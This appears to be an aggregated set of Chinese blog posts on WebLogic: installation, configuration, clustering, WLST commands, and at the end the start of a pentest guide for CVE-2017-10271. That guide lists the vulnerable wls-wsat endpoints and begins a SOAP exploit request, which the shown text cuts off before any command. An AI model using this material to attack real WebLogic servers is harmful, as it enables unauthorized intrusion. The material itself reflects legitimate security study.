精华内容
下载资源
问答
  • Weblogic 中间件

    千次阅读 2020-03-06 19:08:59
    中间件 中间件(middleware)是基础软件的一大类, 属于可复用软件的范畴. 顾名思义,中间件处于操作系统软件与用户的应用软件的中间. 中间件在操作系统、网络和数据库之上,应用软件的下层,总的作用是为处于自己上层的...

    中间件

    中间件(middleware)是基础软件的一大类, 属于可复用软件的范畴. 顾名思义,中间件处于操作系统软件与用户的应用软件的中间.
    中间件在操作系统、网络和数据库之上,应用软件的下层,总的作用是为处于自己上层的应用软件提供运行与开发的环境,帮助用户灵活、高效地开发和集成复杂的应用软件.在众多关于中间件的定义中,比较普遍被接受的是IDC表述的:中间件是一种独立的系统软件或服务程序,分布式应用软件借助这种软件在不同的技术之间共享资源, 中间件位于客户机服务器的操作系统之上,管理计算资源和网络通信。

    weblogic

    WebLogic是美国Oracle公司出品的一个application server确切的说是一个基于JAVAEE架构的中间件,BEA WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。

    weblogic 与Tomcat的比较

    Weblogic特点Tomcat特点
    WLS全面支持J2EE的标准规范和其他标准规范,Web Service, SSL, xml,EJB等Tomcat 为WEB容器,只支持部分J2EE标准, 应用局限性强,不支持EJB
    完善的售后支持没有售后支持, 看社区与论坛
    集群机制, 支持分布式的应用需要结合第三方插件/应用
    Web控制台进行组件、JDBC、管理和配置
    较好的支持热部署(开发模式下)
    需要费用开源免费

    下载weblogic

    打开Oracle官方网站: http://www.oracle.com/index.html

    安装

    我一般使用的命令安装的,weblogic运行需要java的运行环境,所以要在计算机上安装java的运行环境,安装完成后使用java -version 或者javac 看是否返回信息,返回信息正常就行了
    java安装1.8版本就ok.下图是我的安装路径
    在这里插入图片描述
    jdk的安装需要配置环境变量
    在我的电脑----属性—高级系统设置–环境变量—系统变量处新建
    变量名:JAVA_HOME
    变量值:jdk的安装路径

    变量名:CLASSPATH
    变量值:.;%JAVA_HOME%\lib;%JAVA_HOME%\lib\tools.jar

    变量名:path
    变量值:%JAVA_HOME%\bin;%JAVA_HOME%\jre\bin(如果前面有变量,需要用;分割开来)

    然后将weglogic的jar包拷贝到jdk的bin目录下
    在这里插入图片描述
    在cmd 中进入bin目录下,然后执行java -jar fmw_12.2.1.3.0_wls.jar
    在这里插入图片描述
    就会启动weblogic的安装

    Weblogic的启动

    在安装目录下有一个startWeblogc双击启动即可。
    在这里插入图片描述

    weblogic 的目录结构

    在这里插入图片描述
    wlserver:weblogic的主目录
    user_projects:定义域存放的位置
    Coherence:在可靠的、高度可伸缩的对等集群协议之上提供了复制的、分布式的(分区的)数据管理和缓存服务

    user_projects 目录结构

    在这里插入图片描述
    Autodeploy:当Weblogic服务实例与开发模式运行时,此目录下应用程序(ear, war)等将被自动展开服务
    Bin:存放域中的可执行文件
    Config:本域相关的配置文件
    Console-ext:控制台信息, 只应用于adminServer
    Lib:存放库文件
    Security:安全相关
    Servers:包含域的所有服务
    StartWebLogic.cmd 调用bin下面的StartWebLogic.cmd
    StartWebLogic.sh:调用bin下面 StartWebLogic.sh (Linux下)

    展开全文
  • WebLogic中间件

    千次阅读 2016-08-21 16:51:28
    weblogic websphere jbossWebLogic介绍、安装什么是中间件中间件(middleware)是基础软件的一大类, 属于可复用软件的范畴. 顾名思义,中间件处于操作系统软件与用户的应用软件的中间. 中间件在操作系统、网络和...

    weblogic websphere jboss

    WebLogic介绍、安装

    什么是中间件?
    中间件(middleware)是基础软件的一大类, 属于可复用软件的范畴. 顾名思义,中间件处于操作系统软件与用户的应用软件的中间.
    中间件在操作系统、网络和数据库之上,应用软件的下层,总的作用是为处于自己上层的应用软件提供运行与开发的环境,帮助用户灵活、高效地开发和集成复杂的应用软件.在众多关于中间件的定义中,比较普遍被接受的是IDC表述的:中间件是一种独立的系统软件或服务程序,分布式应用软件借助这种软件在不同的技术之间共享资源, 中间件位于客户机服务器的操作系统之上,管理计算资源和网络通信

    BEA公司介绍
    著名的Java 中间件软件公司,美国NASDAQ上市公司,其中间件市场份额一度IBM还要高。2008年初被Oracle收购, 客户选择BEA来帮助其将已有的企业软件应用,从笨拙的、冗余的、遗留的客户机/服务器架构体系,发展成为响应灵敏的、成熟的Web基础结构

    什么是WebLogic?
    WebLogic是美国Oracle公司出品的一个application server确切的说是一个基于JAVAEE架构的中间件,BEA WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。

    WebLogic与Tomcat比较

    Weblogic特点Tomcat特点
    WLS全面支持J2EE的标准规范和其他标准规范,Web Service, SSL, xml,EJB等Tomcat 为WEB容器,只支持部分J2EE标准, 应用局限性强,不支持EJB
    完善的售后支持没有售后支持, 看社区与论坛
    集群机制, 支持分布式的应用需要结合第三方插件/应用
    Web控制台进行组件、JDBC、管理和配置
    较好的支持热部署(开发模式下)
    需要费用开源免费

    什么是负载均衡/故障转移?
    在集群系统中. 来自客户的请求可以进行平均分配. 把相应的进程分发给与之共同承担任务的服务器,从而不影响应用进程的运行, 大多数中间件都支持负载均衡,实现负载均衡大大降低了系统的崩溃现象,从而减少对企业带来的损失.
    故障转移:软硬件出现故障,能够有其它相关的软硬件设备来承接相关的工作任务,以保障系统正常工作。

    什么分布式?
    所谓分布式计算是一门计算机科学,它研究如何把一个需要非常巨大的计算能力才能解决的问题分成许多小的部分,然后把这些部分分配给许多计算机进行处理,最后把这些计算结果综合起来得到最终的结果。分布式网络存储技术是将数据分散的存储于多台独立的机器设备上。分布式网络存储系统采用可扩展的系统结构,利用多台存储服务器分担存储负荷,利用位置服务器定位存储信息,不但解决了传统集中式存储系统中单存储服务器的瓶颈问题,还提高了系统的可靠性、可用性和扩展性

    下载WebLogic
    打开Oracle官方网站: http://www.oracle.com/index.html
    安装
    安装完成, 也可以选择QuickStart方式启动
    通过快捷方式找到Weblogic菜单
    快速启动webLogic向导
    创建一个WebLogic域
    webLogic

    选择weblogic域的启动模式
    开发模式:该模式启用自动部署
    生产模式:该模式关闭自动部署(MyEcipse版本不支持产品模式)
    生产模式是为保证速度快放在指定目录下,他的包不会自动更新。开发模式是比较自由的,它保证开发灵活性,随便把它扔哪里都会自动更新,这样会影响速度。一般地开发好的产品,都给客户用产品模式部署

    **Weblogic目录结构**

    WebLogic基本目录介绍
     目录

    Coherence:在可靠的、高度可伸缩的对等集群协议之上提供了复制的、分布式的(分区的)数据管理和缓存服务
    Logs:系统日志目录
    Modules: weblogic运行时需要的jar文件
    user_projects:定义域存放的位置
    Utils:用户可以存放的第三方工具包
    wlserver_10.3:weblogic的主目录

    User_projects目录介绍
    userProject
    Autodeploy:当Weblogic服务实例与开发模式运行时,此目录下应用程序(ear, war)等将被自动展开服务
    Bin:存放域中的可执行文件
    Config:本域相关的配置文件
    Console-ext:控制台信息, 只应用于adminServer
    Lib:存放库文件
    Security:安全相关
    Servers:包含域的所有服务
    StartWebLogic.cmd 调用bin下面的StartWebLogic.cmd
    StartWebLogic.sh:调用bin下面 StartWebLogic.sh (Linux下)

    MyEclipse配置WebLogic
    开启Weblogic服务
    目前Weblogic版本仅仅支持J2EE5.0 因此要把web.xml中的配置文件改成2.5规范

    Weblogic概念介绍


    域Domain
    WebLogic Server中的域是逻辑上相关的一组 WebLogic Server 资源,可以作为一个单元进行管理。一个域中包含一台或多台 WebLogic Server,也可以包含 WebLogic Server 群集。域是由单个管理服务器管理的 WebLogic Server 实例的集合
    域

    Managed Server
    被管理服务器也是一个WebLogic Server的实例,他从Admin Server那里获取配置信息。通常在Managed Server上部署自己的服务、组件或应用。基于性能考虑,Managed Server维护着一份只读的域配置文件,当服务启动的时候,会从Admin Server上同步配置文件信息,如果配置文件发生了改变,Admin Server也会将改变推送到Managed Server上
    Administrator Server
    管理服务器是控制整个域配置的中心操作节点,管理服务器维护着整个域 Domain 的配置并将配置分配到每个被管理服务器 Managed Server 中,每个域中都必须有一个Administration Server
    计算机Machine
    是指运行WebLogic Server实例的物理机器,通常与部属在其上的Managed Server相关连。Machine用于Node Manager(一个运行在物理服务器上的进程)
    Cluster集群
    集群是一组WebLogic Server的组合,集群是为了满足服务的高可用(High Avilability)以及可扩展(Load Balancing)需求而出现的。需要注意的是,集群中的WebLogic Server必须版本号一致。Cluster需要注意的几个问题:不能够跨Domain、Cluster中的服务器必须在同一个域中、Domain中可以有多个Cluster
    cluster

    启动与服务相关配置
    1.1.20.启动与服务相关配置
    WebLogic的启动是通过启动文件来完成的,不同的服务定义在不通的启动配置文件中,都在域的bin目录中
    StartWebLogic:启动管理服务器
    StartManagedWebLogic:启动被管理服务器
    StopWebLogic:关闭管理服务器
    StopManagerWebLogic:关闭被管服务器
    系统配置文件config.xml 存放这域内所有的配置信息,该文件的存放在域中的config目录的config.xml中,修改后端口信息就保存在此文件中

    WebLogic生命周期
    SHUTDOWN 状态下,WebLogic Server 实例已配置但处于非活动状态
    STARTING 状态期间,由于执行”启动”、”管理模式启动”或”以待机模式启动”命令,WebLogic Server 实例从 SHUTDOWN 转换为 STANDBY
    STANDBY 状态的服务器实例不处理任何请求,它的常用监听端口处于关闭状态。管理端口处于打开状态,可以接受将服务器实例转换为 RUNNING 或 SHUTDOWN 状态的生命周期命令
    在 ADMIN 状态下,WebLogic Server 启动并运行,但仅用于管理操作,您可以在此状态下执行服务器级和应用程序级管理任务
    在此转换状态中,WebLogic Server 执行将其从 STANDBY 或 ADMIN 状态转换为 RUNNING 状态所需要的操作
    在 RUNNING 状态下,WebLogic Server 处于完全工作状态,可以向客户端提供服务并作为一个完整的群集成员运行

    展开全文
  • WebLogic中间件 websphere 、jboss WebLogic介绍、安装 1.1.1. 什么是中间件        中间件(middleware)是基础软件的一大类, 属于可复用软件的范畴. 顾名思义,中间件处于操作系统软件与用户的...


    前言

    本文针对windows系统进行安装、介绍,后续如果需要可以针对Linux命令行、带GUI桌面进行安装介绍。


    提示:以下是本篇文章正文内容,下面案例可供参考

    一、WebLogic是什么?

    WebLogic介绍、安装

    1.1.1. 什么是中间件
           中间件(middleware)是基础软件的一大类, 属于可复用软件的范畴. 顾名思义,中间件处于操作系统软件与用户的应用软件的中间.。
           中间件在操作系统、网络和数据库之上,应用软件的下层,总的作用是为处于自己上层的应用软件提供运行与开发的环境,帮助用户灵活、高效地开发和集成复杂的应用软件.在众多关于中间件的定义中,比较普遍被接受的是IDC表述的:中间件是一种独立的系统软件或服务程序,分布式应用软件借助这种软件在不同的技术之间共享资源, 中间件位于客户机服务器的操作系统之上,管理计算资源和网络通信。

    1.1.2. BEA公司介绍
           著名的Java 中间件软件公司,美国NASDAQ上市公司,其中间件市场份额一度IBM还要高。2008年初被Oracle收购, 客户选择BEA来帮助其将已有的企业软件应用,从笨拙的、冗余的、遗留的客户机/服务器架构体系,发展成为响应灵敏的、成熟的Web基础结构。

    1.1.3. 什么是WebLogic
           WebLogic是美国Oracle公司出品的一个application server确切的说是一个基于JAVAEE架构的中间件,BEA WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。

    1.1.4. WebLogic与Tomcat比较

    Weblogic特点Tomcat特点
    WLS全面支持J2EE的标准规范和其他标准规范,Web Service, SSL, xml,EJB等Tomcat 为WEB容器,只支持部分J2EE标准, 应用局限性强,不支持EJB
    完善的售后支持没有售后支持, 看社区与论坛
    集群机制, 支持分布式的应用需要结合第三方插件/应用
    Web控制台进行组件、JDBC、管理和配置
    较好的支持热部署(开发模式下)
    需要费用开源免费

    1.1.5. 什么是负载均衡/故障转移
           在集群系统中. 来自客户的请求可以进行平均分配. 把相应的进程分发给与之共同承担任务的服务器,从而不影响应用进程的运行, 大多数中间件都支持负载均衡,实现负载均衡大大降低了系统的崩溃现象,从而减少对企业带来的损失。
           故障转移:软硬件出现故障,能够有其它相关的软硬件设备来承接相关的工作任务,以保障系统正常工作。

    1.1.6. 什么分布式
    什么是分布式计算?所谓分布式计算是一门计算机科学,它研究如何把一个需要非常巨大的计算能力才能解决的问题分成许多小的部分,然后把这些部分分配给许多计算机进行处理,最后把这些计算结果综合起来得到最终的结果。分布式网络存储技术是将数据分散的存储于多台独立的机器设备上。分布式网络存储系统采用可扩展的系统结构,利用多台存储服务器分担存储负荷,利用位置服务器定位存储信息,不但解决了传统集中式存储系统中单存储服务器的瓶颈问题,还提高了系统的可靠性、可用性和扩展性。

    1.1.7. 下载WebLogic

    • 打开Oracle官方网站: 【点击打开】
      在这里插入图片描述
    • 在中间件中找到Weblogic产品
      在这里插入图片描述
    • 下载最稳定的版本10.3.6

    在这里插入图片描述

    • 根据自己的系统平台选择下载32或者64版本
      在这里插入图片描述
    1. Oracle WebLogic Server 11gR1 (10.3.4) + Coherence + OEPE Package Installer – 此安装包为离线完整安装包, 可安装包括 Oracle WebLogic Server 组件, 以及 Oracle Coherence 和Oracle Enterprise Pack for Eclipse开发工具.
    2. Oracle WebLogic Server 11gR1 (10.3.4) + Coherence Package Installer – 此安装包为离线完整安装包, 可安装包括 Oracle WebLogic Server 组件, 以及 Oracle Coherence
    3. Oracle WebLogic Server 11gR1 (10.3.4) ZIP Installer 此ZIP压缩包格式仅用于WebLogic Server 开发. 它只包含了安装和运行WebLogic服务器的必要文件, 此包也不包含 Oracle Coherence 或者Oracle Enterprise pack for Eclipse
      1.1.8. WebLogic安装
      1.执行:wls1036_win32.exe 安装比较简单,典型的windows安装,一路"下一步",即可安装截图如下
      在这里插入图片描述
      2.选择要安装的目录建议安装到非系统盘
      在这里插入图片描述
      3.取消自动更新选项
      在这里插入图片描述
      4.选择定制安装
      在这里插入图片描述
      5.选中安装Server Exampes
      在这里插入图片描述
      6.选择自己的JDK, 和安装JRockit(可选)

    在这里插入图片描述

    7.选择组件的产品安装目录
    在这里插入图片描述
    8.安装服务与设置端口号
    在这里插入图片描述
    9.选择是否创建快捷方式
    在这里插入图片描述
    10.前面所设置的安装列表
    在这里插入图片描述
    11.安装进行中…
    在这里插入图片描述
    12.安装完成, 也可以选择QuickStart方式启动,或者正常启动都可以
    在这里插入图片描述
    13.通过快捷方式找到Weblogic菜单
    在这里插入图片描述
    14.快速启动webLogic向导
    在这里插入图片描述
    15.创建一个WebLogic域

    在这里插入图片描述
    16.选择创建的域支持那些产品服务
    在这里插入图片描述
    17.定义域的名称与存放位置, 可以修改自己感兴趣的名称
    在这里插入图片描述
    18.配置管理员的用户名和口令
    在这里插入图片描述
    19.选择weblogic域的启动模式

    开发模式:该模式启用自动部署

    生产模式:该模式关闭自动部署(MyEcipse版本不支持产品模式)

    生产模式是为保证速度快放在指定目录下,他的包不会自动更新。开发模式是比较自由的,它保证开发灵活性,随便把它扔哪里都会自动更新,这样会影响速度。一般地开发好的产品,都给客户用产品模式部署
    在这里插入图片描述
    20.选择可选配置
    在这里插入图片描述
    21.显示了配置概要
    在这里插入图片描述
    22.创建域的相关信息
    在这里插入图片描述
    23.WebLogic启动,停止,管理页面登录
    在这里插入图片描述

    Weblogic目录结构

    1.1.9. WebLogic基本目录介绍
    在这里插入图片描述

    • Coherence:在可靠的、高度可伸缩的对等集群协议之上提供了复制的、分布式的(分区的)数据管理和缓存服务
    • Logs:系统日志目录
    • Modules: weblogic运行时需要的jar文件
    • user_projects:定义域存放的位置
    • Utils:用户可以存放的第三方工具包
    • wlserver_10.3:weblogic的主目录

    1.1.10. User_projects目录介绍
    在这里插入图片描述

    • Autodeploy:当Weblogic服务实例与开发模式运行时,此目录下应用程序(ear, war)等将被自动展开服务
    • Bin:存放域中的可执行文件
    • Config:本域相关的配置文件
    • Console-ext:控制台信息, 只应用于adminServer
    • Lib:存放库文件
    • Security:安全相关
    • Servers:包含域的所有服务
    • StartWebLogic.cmd 调用bin下面的StartWebLogic.cmd
    • StartWebLogic.sh:调用bin下面 StartWebLogic.sh (Linux下)

    1.1.11. Wlserver_10.3

    • Common:由产品组件共享的文件,包括计算机上运行的所有WebLogic域所公用的环境属性, 创建域提供Configuration Wizard和WLST脱机使用的模板JAR文件
    • Server:WebLogic Server程序文件
    • Uninstall:卸载webLogic产品目录

    MyEclipse配置WebLogic

    1.1.12. 开启Weblogic服务
    在这里插入图片描述

    1.1.13. 配置Weblogic与Tomcat相同
    在这里插入图片描述
    1.1.14. 项目部署到WebLogic中

    • 目前Weblogic版本仅仅支持J2EE5.0 因此要把web.xml中的配置文件改成2.5规范
    <web-app version="2.5" 
    	xmlns="http://java.sun.com/xml/ns/javaee" 
    	xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" 
    	xsi:schemaLocation="http://java.sun.com/xml/ns/javaee 
    	http://java.sun.com/xml/ns/javaee/web-app_2_5.xsd">
    
    
    • 如果是开发模式,则可以测试热部署的执行情况

    Weblogic概念介绍

    1.1.15. 域Domain
            WebLogic Server中的域是逻辑上相关的一组 WebLogic Server 资源,可以作为一个单元进行管理。一个域中包含一台或多台 WebLogic Server,也可以包含 WebLogic Server 群集。域是由单个管理服务器管理的 WebLogic Server 实例的集合。
    在这里插入图片描述
    1.1.16. Managed Server
    被管理服务器也是一个WebLogic Server的实例,他从Admin Server那里获取配置信息。通常在Managed Server上部署自己的服务、组件或应用。基于性能考虑,Managed Server维护着一份只读的域配置文件,当服务启动的时候,会从Admin Server上同步配置文件信息,如果配置文件发生了改变,Admin Server也会将改变推送到Managed Server上。

    1.1.17. Administrator Server
    管理服务器是控制整个域配置的中心操作节点,管理服务器维护着整个域 Domain 的配置并将配置分配到每个被管理服务器 Managed Server 中,每个域中都必须有一个Administration Server。

    1.1.18. 计算机Machine
    是指运行WebLogic Server实例的物理机器,通常与部属在其上的Managed Server相关连。Machine用于Node Manager(一个运行在物理服务器上的进程)。

    1.1.19. Cluster集群
    集群是一组WebLogic Server的组合,集群是为了满足服务的高可用(High Avilability)以及可扩展(Load Balancing)需求而出现的。需要注意的是,集群中的WebLogic Server必须版本号一致。Cluster需要注意的几个问题:不能够跨Domain、Cluster中的服务器必须在同一个域中、Domain中可以有多个Cluster。
    在这里插入图片描述
    1.1.20. 启动与服务相关配置
    WebLogic的启动是通过启动文件来完成的,不同的服务定义在不通的启动配置文件中,都在域的bin目录中

    • StartWebLogic:启动管理服务器
    • StartManagedWebLogic:启动被管理服务器
    • StopWebLogic:关闭管理服务器
    • StopManagerWebLogic:关闭被管服务器

    系统配置文件config.xml 存放这域内所有的配置信息,该文件的存放在域中的config目录的config.xml中,修改后端口信息就保存在此文件中。

    1.1.21. WebLogic生命周期

    • SHUTDOWN 状态下,WebLogic Server 实例已配置但处于非活动状态
    • STARTING 状态期间,由于执行"启动"、"管理模式启动"或"以待机模式启动"命令,WebLogic Server 实例从 SHUTDOWN 转换为 STANDBY
    • STANDBY 状态的服务器实例不处理任何请求,它的常用监听端口处于关闭状态。管理端口处于打开状态,可以接受将服务器实例转换为 RUNNING 或 SHUTDOWN 状态的生命周期命令
    • 在 ADMIN 状态下,WebLogic Server 启动并运行,但仅用于管理操作,您可以在此状态下执行服务器级和应用程序级管理任务
    • 在此转换状态中,WebLogic Server 执行将其从 STANDBY 或 ADMIN 状态转换为 RUNNING 状态所需要的操作
    • 在 RUNNING 状态下,WebLogic Server 处于完全工作状态,可以向客户端提供服务并作为一个完整的群集成员运行

    创建被管服务器、MSI、节点管理器

    1.1.22. 创建一个被管理服务

    • 启动WebServie主服务,登录到后台控制器
      在这里插入图片描述
    • 填写受管理服务的相关信息
      在这里插入图片描述
    • 创建好的受管理服务,默认停止的,要启动它
      在这里插入图片描述
    • 通过:StartManagedWebLogic.cmd 被管理服务名 http://主机名:主服务端口号来启动被管理服务在base_domain\servers\ 会新增加一个Server-0服务。
    • 注意如果被管服务器启动提示内存不足,则可以配置启动内存:单击服务器—>
    • 服务器启动–>参数 -Xms512m -Xmx512m -XX:MaxPermSize=512m

    1.1.23. MSI介绍

    • Managed Server Independence受管服务器独立性:受管服务器拥有一份域配置信息的副本.当受管服务器启动的时候,它会从管理服务器获取到配置信息.如果受管服务器启动的时候不能连上管理服务器. 就使用本地的缓存配置信息启动.这就是MSI模式. MSI模式默认开启的
    • 如何开启MSI功能:选中”受管服务器”—>”优化”—>”高级”---->”受管服务器独立性”
    • 在MSI模式下, 被管服务器:自动寻找本地config目录下的config.xml文件.寻找本地security目录下的SerializedSystemlni.dat文件和boot.Properties文件。

    1.1.24. 使用WLST工具

    • WebLogic Scripting Tool (WSLT)是一个命令脚本工具, 可以用来创建、管理、监控WebLogic域.它基于Jython语法编写的可以在:
    • WL_HOME\common\bin\wlst.cmd 中启动WLST,也可以在开始菜单启动WLST
    • Online模式(使用WLST连接正在运行的管理服务器):管理活动域的配置、查看域中的性能数据、管理安全数据(例如添加删除用户等…)
    • 使用WLST连接被管理服务器,但是不能通过被管理的服务器修改配置。
    • Offline模式(使用WLST没有连接管理服务器):可以创建域模板、创建域、扩展活动域等等
    • netstat -a -n // 查看网络端口
    • help(‘all’) // 查看所有命令帮助
    • help(‘connect’) // 查看connect命令的帮助
    • connect (‘weblogic’,‘weblogic123’,‘t3://localhost:7001’)
    • connect (‘weblogic’,‘weblogic123’)
    • disconnect() ls() 查看 exit()
    • State(‘AdminServer’): 目前是RUNNING状态
    • 挂起:suspend() 恢复:suspend() 关闭:shutdown()

    集群配置

    1.1.25. 创建两台被管理服务器Server-0,Server-1

    • 选中”服务器”—>新建
      在这里插入图片描述

    • 设置服务器名称、IP地址
      在这里插入图片描述

    • 默认是SHUTDOWN默认,可以通过命令启动被管服务器
      在这里插入图片描述
      1.1.26. 创建集群

    • 新创建一个集群, 配置集群的名称与传送端口
      在这里插入图片描述

    • 把Server-0,1添加到集群中
      在这里插入图片描述
      1.1.27. 创建代理服务器Proxy(必须要先创建代理服务器)

    • 首先在”程序菜单”打开代理服务器向导 Configuraction Wizard在这里插入图片描述

    • 选择扩展现有的Welogic域, 我们要给被集群的服务器创建一个代理程序
      在这里插入图片描述

    • 选中要扩展的域,此处选中base_doamin
      在这里插入图片描述

    • 选中代理的方式 JAX-RPC, 就是基于XML的远程过程调用协议, JAX-WS是基于XML的WebService服务. 此处我们需要通过XML配置被代理服务器的IP信息, 然后代理服务器吧请求获取后交给被代理服务器。
      在这里插入图片描述

    • 选中需要添加的功能 2和3选项
      在这里插入图片描述

    • 如果需要修改端口则可以单击修改
      在这里插入图片描述

    • 如果需要修改集群的配置则单击修改
      在这里插入图片描述

    • 配置集群中的受管服务器, 此处如果遵循前面的配置即可
      在这里插入图片描述

    • 创建HTTP代理服务器,对请求进行转发在这里插入图片描述

    • 询问是否添加计算机,没有计算机,就不用添加

    • 选择把项目部署到集群中
      在这里插入图片描述

    • 将服务定位到集群或者服务器
      在这里插入图片描述

    • 显示了前面配置概要
      在这里插入图片描述

    • 最后会自动生成代理项目路径为: user_projects\domains\base_domain\apps
      Web.xml中配置如下:

    <!DOCTYPE web-app PUBLIC "-//Sun Microsystems, Inc.//DTD Web Application 2.3//EN" "http://java.sun.com/dtd/web-app_2_3.dtd">
    <web-app>
    	<!--HttpClusterServlet来拦截请求,然后转发给被代理的服务器  -->
    	<servlet>
    		<servlet-name>HttpClusterServlet</servlet-name>
    		<servlet-class>weblogic.servlet.proxy.HttpClusterServlet</servlet-class>
    		<!-- 配置了集群的服务器, 服务器与服务器之间用 |隔开 -->
    		<init-param>
    			<param-name>WebLogicCluster</param-name>
    			<param-value>127.0.0.1:8001|127.0.0.1:8002</param-value>
    		</init-param>
    	</servlet>
    	<!-- 配置了需要拦截的 路径,与后缀,根据情况自行添加 -->
    	<servlet-mapping>
    		<servlet-name>HttpClusterServlet</servlet-name>
    		<url-pattern>/</url-pattern>
    	</servlet-mapping>
    	<servlet-mapping>
    		<servlet-name>HttpClusterServlet</servlet-name>
    		<url-pattern>*.jsp</url-pattern>
    	</servlet-mapping>
    	<servlet-mapping>
    		<servlet-name>HttpClusterServlet</servlet-name>
    		<url-pattern>*.jspf</url-pattern>
    	</servlet-mapping>
    	<servlet-mapping>
    		<servlet-name>HttpClusterServlet</servlet-name>
    		<url-pattern>*.htm</url-pattern>
    	</servlet-mapping>
    	<servlet-mapping>
    		<servlet-name>HttpClusterServlet</servlet-name>
    		<url-pattern>*.html</url-pattern>
    	</servlet-mapping>
    </web-app>
    
    
    
    • Weblogic.xml中配置访问项目的前缀
    <!DOCTYPE weblogic-web-app PUBLIC "-//BEA Systems, Inc.//DTD Web Application 8.1//EN" "http://www.bea.com/servers/wls810/dtd/weblogic810-web-jar.dtd">
    <weblogic-web-app>
    <!-- 配置访问项目的前缀 -->
    <context-root>/项目URL</context-root>
    </weblogic-web-app>
    
    
    • 最后把生成的项目部署到代理服务器, 测试即可
      在这里插入图片描述

    其它主要事项

    1.1.28. 关于密码设置于修改

    • 在启动的时候如何没有提示输入密码,则说明密码已经存储到当前服务security目录下
      在这里插入图片描述
    • 如何修改密码

    在这里插入图片描述

    总结

    以上就是今天要讲的内容,本文仅仅简单介绍了weblogic的使用,而weblogic提供了大量能使我们快速便捷地处理数据的函数和方法。

    展开全文
  • WebLogic是美国Oracle公司出品的一个application server确切的说是一个基于JAVAEE架构的中间件,BEA WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。WebLogic是...

    一.weblogic简介

    WebLogic是美国Oracle公司出品的一个application server确切的说是一个基于JAVAEE架构的中间件,BEA WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。

    WebLogic Server具有标准和可扩展性的优点,对业内多种标准都可全面支持,包括EJB、JSP、Servlet、JMS、JDBC、XML(标准通用标记语言的子集)和WML,使Web应用系统的实施更为简单,并且保护了投资,同时也使基于标准的解决方案的开发更加简便,同时WebLogic Server以其高扩展的架构体系闻名于业内,包括客户机连接的共享、资源pooling以及动态网页和EJB组件群集。

    默认端口: 7001

    目前较为活跃的版本:

    Weblogic 10.3.6.0
    Weblogic 12.1.3.0
    Weblogic 12.2.1.1
    Weblogic 12.2.1.2
    Weblogic 12.2.1.3
    

    二.weblogic安装

    下载地址:https://www.oracle.com/middleware/technologies/weblogic-server-installers-downloads.html

    weblogic最新的版本需要jdk1.8以上,如果jdk1.7或者以下,可能会安装不了,jdk1.6的话应该是10.3.6及以下。

    weblogic 10.3.6安装

    这里安装环境为win7

    image-20210809105230816

    image-20210809105644198

    双击启动安装

    image-20210809105814087

    image-20210809110119887

    image-20210809110133160

    image-20210809110203679

    image-20210809110238157

    image-20210809154158552

    image-20210809154229316

    image-20210809110431311

    image-20210809110646798

    安装完成后自动出现快速启动页面

    image-20210809111057748

    这里默认即可

    image-20210809111349116

    这里我的是zcc12345

    开发模式:该模式启用自动部署;生产模式:该模式关闭自动部署(MyEcipse版本不支持产品模式)

    image-20210809134240451

    image-20210809134317197

    image-20210809134433087

    一直默认下一步之后点击创建

    image-20210809134616650

    image-20210809134650091

    weblogic 10.3.6配置

    进入该目录下,双击红框中的startWebLogic.cmd,启动weblogic

    image-20210809134918621

    输入刚刚设置的weblogic用户名和密码

    weblogic
    zcc12345
    

    image-20210809135306951

    打开浏览器输入控制台url,进入控制台进行管理

    http://192.168.10.154:7001/console/
    

    [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-jnDd6BgA-1628955549508)(C:/Users/zcc/AppData/Roaming/Typora/typora-user-images/image-20210809135607222.png)]

    用户名密码还是上面设置的weblogic/zcc12345

    weblogic 12.1.3安装

    12版本的安装需要在jdk7的环境下,这里我已经安装完成

    image-20210814161036126

    image-20210814162020929

    官网下载安装包,官网链接:https://www.oracle.com/middleware/technologies/weblogic-server-installers-downloads.html

    image-20210814160458436

    将下载好的安装包放入jdk的bin目录下,防止因环境变量带空格导致的错误,过程一直默认下一步即可

    image-20210814162427162

    这里一定要以管理员身份运行,不然提取文件会失败

    java -jar fmw_12.1.3.0.0_wls.jar
    

    image-20210814163432029

    image-20210814165250515

    image-20210814165616715

    接下来安装域

    在电脑上找到Configuration Wizard,双击运行

    image-20210814165704899

    选择下一步->下一步

    image-20210814165802594

    输入口令,这里用户名默认,口令设置的是zcc12345

    image-20210814165857818

    下一步

    image-20210814165945030

    image-20210814165958254

    选本机IP

    image-20210814170040154

    image-20210814170128516

    image-20210814170217064

    image-20210814170242532

    image-20210814170306146

    weblogic 12.1.3配置

    进入该目录下启动,这里不再需要输入账号密码

    C:\Oracle\Middleware\Oracle_Home\user_projects\domains\base_domain
    

    image-20210814170531939

    成功搭建,可正常访问。

    三.weblogic渗透总结

    1.XMLDecoder 反序列化漏洞 CVE-2017-10271

    漏洞简介

    Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。

    影响版本
    10.3.6.0
    12.1.3.0.0
    12.2.1.1.0
    
    验证漏洞

    当访问该路径 /wls-wsat/CoordinatorPortType (POST),出现如下图所示的回显时,只要是在wls-wsat包中的皆受到影响,可以查看web.xml查看所有受影响的url,说明存在该漏洞;

    image-20210809140942304

    C:\Oracle\Middleware\user_projects\domains\base_domain\servers\AdminServer\tmp\_WL_internal\wls-wsat\54p17w\war\WEB-INF
    

    进行该路径查看web.xml;

    image-20210809141314849

    image-20210809141512699

    总结下来就是下面这些url会受到影响;

    /wls-wsat/CoordinatorPortType
    /wls-wsat/RegistrationPortTypeRPC
    /wls-wsat/ParticipantPortType
    /wls-wsat/RegistrationRequesterPortType
    /wls-wsat/CoordinatorPortType11
    /wls-wsat/RegistrationPortTypeRPC11
    /wls-wsat/ParticipantPortType11
    /wls-wsat/RegistrationRequesterPortType11
    
    漏洞复现

    抓包,修改内容

    <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
     <soapenv:Header>
